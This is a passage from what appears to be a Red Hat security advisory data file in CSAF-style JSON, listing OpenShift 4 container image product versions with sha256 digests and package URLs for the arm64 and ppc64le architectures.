"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-openstack-rhel9@sha256%3Aeca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564642"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-config-rhel9-operator@sha256%3A4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604341"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"product_id": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-os-images-rhel9@sha256%3Adae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775619097"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"product_id": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-admission-controller-rhel9@sha256%3A7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604704"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"product_id": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-route-override-cni-rhel9@sha256%3Aaa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605900"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"product_id": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-whereabouts-ipam-cni-rhel9@sha256%3A581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605545"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-must-gather-rhel9@sha256%3A05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564698"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"product_id": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-network-interface-bond-cni-rhel9@sha256%3A16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605259"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"product_id": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-network-metrics-daemon-rhel9@sha256%3Ae605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605534"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"product": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"product_id": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/network-tools-rhel9@sha256%3A1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607479"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-apiserver-rhel9@sha256%3Abb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605934"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"product_id": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-olm-catalogd-rhel9@sha256%3Acc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604244"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-olm-operator-controller-rhel9@sha256%3A6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604309"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"product_id": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-apiserver-rhel9@sha256%3A560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572127"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"product_id": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-controller-manager-rhel9@sha256%3A2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564516"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cinder-csi-driver-rhel9@sha256%3A2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606187"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cinder-csi-driver-rhel9-operator@sha256%3Aa51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606809"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cloud-controller-manager-rhel9@sha256%3A39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564624"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"product_id": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-framework-tools-rhel9@sha256%3A68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605528"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"product_id": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ovirt-csi-driver-rhel9@sha256%3A15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606167"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-rhel9@sha256%3Af3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577363"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"product": {
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"product_id": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/openshift-route-controller-manager-rhel9@sha256%3Aab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565065"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"product_id": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-service-ca-rhel9-operator@sha256%3A355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604108"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"product_id": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-tools-rhel9@sha256%3A05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564250"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-microshift-rhel9@sha256%3A28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577164"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"product_id": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prom-label-proxy-rhel9@sha256%3A2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606843"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-config-reloader-rhel9@sha256%3Aa40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604108"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-rhel9-operator@sha256%3Ae838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606131"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-operator-admission-webhook-rhel9@sha256%3Af99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606725"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"product_id": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-telemeter-rhel9@sha256%3A6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604846"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"product_id": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-thanos-rhel9@sha256%3A458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606385"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-autoscaler-rhel9@sha256%3A26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573215"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"product_id": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/aws-karpenter-provider-aws-rhel9@sha256%3Aa95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572657"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"product_id": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/aws-kms-encryption-provider-rhel9@sha256%3Ae5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564570"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"product_id": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/azure-kms-encryption-provider-rhel9@sha256%3A35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605177"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"product_identification_helper": {
